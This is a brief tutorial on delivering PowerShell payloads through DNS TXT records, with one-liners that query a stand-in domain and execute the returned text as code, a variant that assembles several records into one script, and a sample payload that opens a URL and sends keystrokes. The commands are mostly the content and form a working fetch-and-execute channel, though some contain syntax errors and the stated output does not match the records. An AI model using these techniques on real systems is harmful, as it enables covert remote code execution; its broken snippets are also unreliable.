Download payloads trough dns

First you need to create a new DNS entry on your host like

type | name | data

txt | hello.example.com | echo 'this is a payload through dns'

now you just need to use powershell to execute this payload

powershell . (nslookup -q=txt hello.example.com)[-1]

now take a look at this example to extract tree lines from the dns domain records

name | data

hello | echo 'example 1'

from | echo 'example 2'

1337 | echo 'example 3'

and using this payload:

1..3|%{$p+=Resolve-DnsName "$_hello.example.com." -Ty TXT |% S*s};& {[scriptblock]::Create($p))

the result would be :

hello

from

1337

if you are using powershell on any other environment than "badwindows" you need to adjust your payload like this:

powershell 1..3|%{$p+=Resolve-DnsName \"$_.example.com.\" -Ty TXT |% S*s};& {[scriptblock]::Create($p))

spot the powershell and back slash's: you need to scape the quotes and at begin add "powershell" now lets take a look on this dns record.

Of course you can use your imagination for any other payloads...

This one for example:

Add-Type -A System.Windows.Forms;$o=New-Object-C WScript.Shell;Saps https://example.com;Sleep 3;[System.Windows.Forms.SendKeys]::SendWait('{TAB}{TAB}{ENTER}');Sleep 1;[System.Windows.Forms.SendKeys]::SendWait("%{F4}")